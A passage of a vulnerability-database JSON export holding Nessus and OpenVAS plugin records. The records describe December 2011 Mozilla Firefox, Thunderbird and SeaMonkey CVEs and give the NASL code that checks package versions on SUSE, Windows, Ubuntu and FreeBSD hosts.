reference:\"MozillaThunderbird-translations-other-9.0-33.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"chmsee-1.99.05-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"chmsee-debuginfo-1.99.05-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"chmsee-debugsource-1.99.05-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"enigmail-1.3.4+9.0-33.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"enigmail-debuginfo-1.3.4+9.0-33.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-js-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-js-debuginfo-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-js192-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-js192-debuginfo-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-xulrunner192-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-xulrunner192-buildsymbols-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-xulrunner192-debuginfo-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-xulrunner192-debugsource-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-xulrunner192-devel-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-xulrunner192-devel-debuginfo-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-xulrunner192-gnome-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-xulrunner192-gnome-debuginfo-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-xulrunner192-translations-common-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"mozilla-xulrunner192-translations-other-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"seamonkey-2.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"seamonkey-debuginfo-2.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"seamonkey-debugsource-2.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"seamonkey-dom-inspector-2.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"seamonkey-irc-2.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"seamonkey-translations-common-2.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"seamonkey-translations-other-2.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"seamonkey-venkman-2.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xulrunner-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xulrunner-buildsymbols-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xulrunner-debuginfo-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xulrunner-debugsource-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xulrunner-devel-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"xulrunner-devel-debuginfo-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-js-32bit-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-js-debuginfo-32bit-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-js192-32bit-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-js192-debuginfo-32bit-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-32bit-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-debuginfo-32bit-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-32bit-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-gnome-debuginfo-32bit-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-common-32bit-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"mozilla-xulrunner192-translations-other-32bit-1.9.2.25-2.6.2\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xulrunner-32bit-9.0-2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xulrunner-debuginfo-32bit-9.0-2.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox / MozillaFirefox-branding-upstream / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:32:27", "description": "The installed version of SeaMonkey is earlier than 2.6.0. Such\nversions are potentially affected by the following security issues :\n\n - An out-of-bounds memory access error exists in the\n 'SVG' implementation and can be triggered when 'SVG'\n elements are removed during a 'DOMAttrModified' event\n handler. (CVE-2011-3658)\n\n - Various memory safety errors exist that can lead to\n memory corruption and possible code execution.\n (CVE-2011-3660)\n\n - An error exists in the 'YARR' regular expression\n library that can cause application crashes when\n handling certain JavaScript statements. (CVE-2011-3661)\n\n - It is possible to detect keystrokes using 'SVG'\n animation 'accesskey' events even when JavaScript is\n disabled. (CVE-2011-3663)\n\n - It is possible to crash the application when 'OGG'\n 'video' elements are scaled to extreme sizes.\n (CVE-2011-3665)\n\n - A use-after-free error exists related to the function\n 'nsHTMLSelectElement' that can allow arbitrary code\n execution during operations such as removal of a\n parent node of an element. (CVE-2011-3671)", "edition": 29, "published": "2011-12-20T00:00:00", "title": "SeaMonkey < 2.6.0 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3671", "CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:seamonkey"], "id": "SEAMONKEY_26.NASL", "href": "https://www.tenable.com/plugins/nessus/57353", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57353);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\n \"CVE-2011-3658\",\n \"CVE-2011-3660\",\n \"CVE-2011-3661\",\n \"CVE-2011-3663\",\n \"CVE-2011-3665\",\n \"CVE-2011-3671\"\n );\n script_bugtraq_id(\n 51133,\n 51134,\n 51135,\n 51136,\n 51138,\n 54080\n );\n script_xref(name:\"EDB-ID\", value:\"18847\");\n\n script_name(english:\"SeaMonkey < 2.6.0 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of SeaMonkey\");\n\n script_set_attribute(attribute:\"synopsis\",value:\n\"The remote Windows host contains a web browser that is affected by\nseveral vulnerabilities.\");\n script_set_attribute(attribute:\"description\",value:\n\"The installed version of SeaMonkey is earlier than 2.6.0. Such\nversions are potentially affected by the following security issues :\n\n - An out-of-bounds memory access error exists in the\n 'SVG' implementation and can be triggered when 'SVG'\n elements are removed during a 'DOMAttrModified' event\n handler. (CVE-2011-3658)\n\n - Various memory safety errors exist that can lead to\n memory corruption and possible code execution.\n (CVE-2011-3660)\n\n - An error exists in the 'YARR' regular expression\n library that can cause application crashes when\n handling certain JavaScript statements. (CVE-2011-3661)\n\n - It is possible to detect keystrokes using 'SVG'\n animation 'accesskey' events even when JavaScript is\n disabled. (CVE-2011-3663)\n\n - It is possible to crash the application when 'OGG'\n 'video' elements are scaled to extreme sizes.\n (CVE-2011-3665)\n\n - A use-after-free error exists related to the function\n 'nsHTMLSelectElement' that can allow arbitrary code\n execution during operations such as removal of a\n parent node of an element. (CVE-2011-3671)\"\n );\n\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-056/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-128/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/523754/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-53/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-54/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-55/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-56/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-58/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2012-41/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=739343\");\n\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to SeaMonkey 2.6.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSVGValue Out-of-Bounds Access Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:seamonkey\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"SeaMonkey/Version\");\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/SeaMonkey/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"SeaMonkey\");\n\nmozilla_check_version(installs:installs, product:'seamonkey', fix:'2.6.0', severity:SECURITY_HOLE);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:53:38", "description": "The installed version of Thunderbird is earlier than 9.0 and thus, is\npotentially affected by the following security issues :\n\n - An out-of-bounds memory access error exists in the\n 'SVG' implementation and can be triggered when 'SVG'\n elements are removed during a 'DOMAttrModified' event\n handler. (CVE-2011-3658)\n\n - Various memory safety errors exist that can lead to\n memory corruption and possible code execution. \n (CVE-2011-3660)\n\n - An error exists in the 'YARR' regular expression\n library that can cause application crashes when\n handling certain JavaScript statements. (CVE-2011-3661)\n\n - It is possible to detect keystrokes using 'SVG'\n animation 'accesskey' events even when JavaScript is\n disabled. (CVE-2011-3663)\n\n - It is possible to crash the application when 'OGG'\n 'video' elements are scaled to extreme sizes. \n (CVE-2011-3665)\n\n - A use-after-free error exists related to the function\n 'nsHTMLSelectElement' that can allow arbitrary code\n execution during operations such as removal of a\n parent node of an element. (CVE-2011-3671)", "edition": 30, "published": "2011-12-20T00:00:00", "title": "Mozilla Thunderbird < 9.0 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3671", "CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:thunderbird"], "id": "MOZILLA_THUNDERBIRD_90.NASL", "href": "https://www.tenable.com/plugins/nessus/57352", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57352);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\n \"CVE-2011-3658\",\n \"CVE-2011-3660\",\n \"CVE-2011-3661\",\n \"CVE-2011-3663\",\n \"CVE-2011-3665\",\n \"CVE-2011-3671\"\n );\n script_bugtraq_id(\n 51133,\n 51134,\n 51135,\n 51136,\n 51138,\n 54080\n );\n script_xref(name:\"EDB-ID\", value:\"18847\");\n\n script_name(english:\"Mozilla Thunderbird < 9.0 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Thunderbird\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a mail client that is potentially\naffected by several vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Thunderbird is earlier than 9.0 and thus, is\npotentially affected by the following security issues :\n\n - An out-of-bounds memory access error exists in the\n 'SVG' implementation and can be triggered when 'SVG'\n elements are removed during a 'DOMAttrModified' event\n handler. (CVE-2011-3658)\n\n - Various memory safety errors exist that can lead to\n memory corruption and possible code execution. \n (CVE-2011-3660)\n\n - An error exists in the 'YARR' regular expression\n library that can cause application crashes when\n handling certain JavaScript statements. (CVE-2011-3661)\n\n - It is possible to detect keystrokes using 'SVG'\n animation 'accesskey' events even when JavaScript is\n disabled. (CVE-2011-3663)\n\n - It is possible to crash the application when 'OGG'\n 'video' elements are scaled to extreme sizes. \n (CVE-2011-3665)\n\n - A use-after-free error exists related to the function\n 'nsHTMLSelectElement' that can allow arbitrary code\n execution during operations such as removal of a\n parent node of an element. (CVE-2011-3671)\"\n );\n\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-056/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-12-128/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/523754/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2012-41/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-53/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-54/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-55/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-56/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2011-58/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=739343\");\n\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Thunderbird 9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSVGValue Out-of-Bounds Access Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Thunderbird/Version\");\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\nport = get_kb_item_or_exit(\"SMB/transport\");\n\ninstalls = get_kb_list(\"SMB/Mozilla/Thunderbird/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Thunderbird\");\n\nmozilla_check_version(installs:installs, product:'thunderbird', esr:FALSE, fix:'9.0', skippat:'^3\\\\.1\\\\.', severity:SECURITY_HOLE);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-12-04T11:20:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1306-1", "modified": "2017-12-01T00:00:00", "published": "2012-01-09T00:00:00", "id": "OPENVAS:840857", "href": "http://plugins.openvas.org/nasl.php?oid=840857", "type": "openvas", "title": "Ubuntu Update for firefox USN-1306-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1306_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for firefox USN-1306-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Alexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian Holler,\n David Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse Ruderman, Marcia\n Knous, and Rober Longson discovered several memory safety issues which\n could possibly be exploited to crash Firefox or execute arbitrary code as\n the user that invoked Firefox. (CVE-2011-3660)\n\n Aki Helin discovered a crash in the YARR regular expression library that\n could be triggered by javascript in web content. (CVE-2011-3661)\n\n It was discovered that a flaw in the Mozilla SVG implementation could\n result in an out-of-bounds memory access if SVG elements were removed\n during a DOMAttrModified event handler. An attacker could potentially\n exploit this vulnerability to crash Firefox. (CVE-2011-3658)\n\n Mario Heiderich discovered it was possible to use SVG animation accessKey\n events to detect key strokes even when JavaScript was disabled. A malicious\n web page could potentially exploit this to trick a user into interacting\n with a prompt thinking it came from the browser in a context where the user\n believed scripting was disabled. (CVE-2011-3663)\n\n It was discovered that it was possible to crash Firefox when scaling an OGG\n <video> element to extreme sizes. (CVE-2011-3665)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1306-1\";\ntag_affected = \"firefox on Ubuntu 11.04\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1306-1/\");\n script_id(840857);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-09 13:29:54 +0530 (Mon, 09 Jan 2012)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1306-1\");\n script_cve_id(\"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3658\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n script_name(\"Ubuntu Update for firefox USN-1306-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"firefox\", ver:\"9.0.1+build1-0ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:136141256231070588", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070588", "type": "openvas", "title": "FreeBSD Ports: firefox", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_firefox60.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID e3ff776b-2ba6-11e1-93c6-0011856a6e37\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70588\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n script_version(\"$Revision: 11762 $\");\n script_name(\"FreeBSD Ports: firefox\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following packages are affected:\n\n firefox\n linux-firefox\n linux-seamonkey\n linux-thunderbird\n seamonkey\n thunderbird\n\nCVE-2011-3658\nThe SVG implementation in Mozilla Firefox 8.0, Thunderbird 8.0, and\nSeaMonkey 2.5 does not properly interact with DOMAttrModified event\nhandlers, which allows remote attackers to cause a denial of service\n(out-of-bounds memory access) or possibly have unspecified other\nimpact via vectors involving removal of SVG elements.\n\nCVE-2011-3660\nMultiple unspecified vulnerabilities in the browser engine in Mozilla\nFirefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and SeaMonkey\nbefore 2.6 allow remote attackers to cause a denial of service (memory\ncorruption and application crash) or possibly execute arbitrary code\nvia vectors that trigger a compartment mismatch associated with the\nnsDOMMessageEvent::GetData function, and unknown other vectors.\n\nCVE-2011-3661\nYARR, as used in Mozilla Firefox 4.x through 8.0, Thunderbird 5.0\nthrough 8.0, and SeaMonkey before 2.6, allows remote attackers to\ncause a denial of service (application crash) or possibly execute\narbitrary code via crafted JavaScript.\n\nCVE-2011-3663\nMozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and\nSeaMonkey before 2.6 allow remote attackers to capture keystrokes\nentered on a web page, even when JavaScript is disabled, by using SVG\nanimation accessKey events within that web page.\n\nCVE-2011-3665\nMozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and\nSeaMonkey before 2.6 allow remote attackers to cause a denial of\nservice (application crash) or possibly have unspecified other impact\nvia an Ogg VIDEO element that is not properly handled after scaling.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.mozilla.org/security/announce/2011/mfsa2011-53.html\");\n script_xref(name:\"URL\", value:\"http://www.mozilla.org/security/announce/2011/mfsa2011-54.html\");\n script_xref(name:\"URL\", value:\"http://www.mozilla.org/security/announce/2011/mfsa2011-55.html\");\n script_xref(name:\"URL\", value:\"http://www.mozilla.org/security/announce/2011/mfsa2011-56.html\");\n script_xref(name:\"URL\", value:\"http://www.mozilla.org/security/announce/2011/mfsa2011-58.html\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/e3ff776b-2ba6-11e1-93c6-0011856a6e37.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"firefox\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.0,1\")>0 && revcomp(a:bver, b:\"9.0,1\")<0) {\n txt += 'Package firefox version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"linux-firefox\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0,1\")<0) {\n txt += 'Package linux-firefox version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"linux-seamonkey\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.6\")<0) {\n txt += 'Package linux-seamonkey version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"linux-thunderbird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0\")<0) {\n txt += 'Package linux-thunderbird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"seamonkey\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.6\")<0) {\n txt += 'Package seamonkey version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"thunderbird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.0\")>0 && revcomp(a:bver, 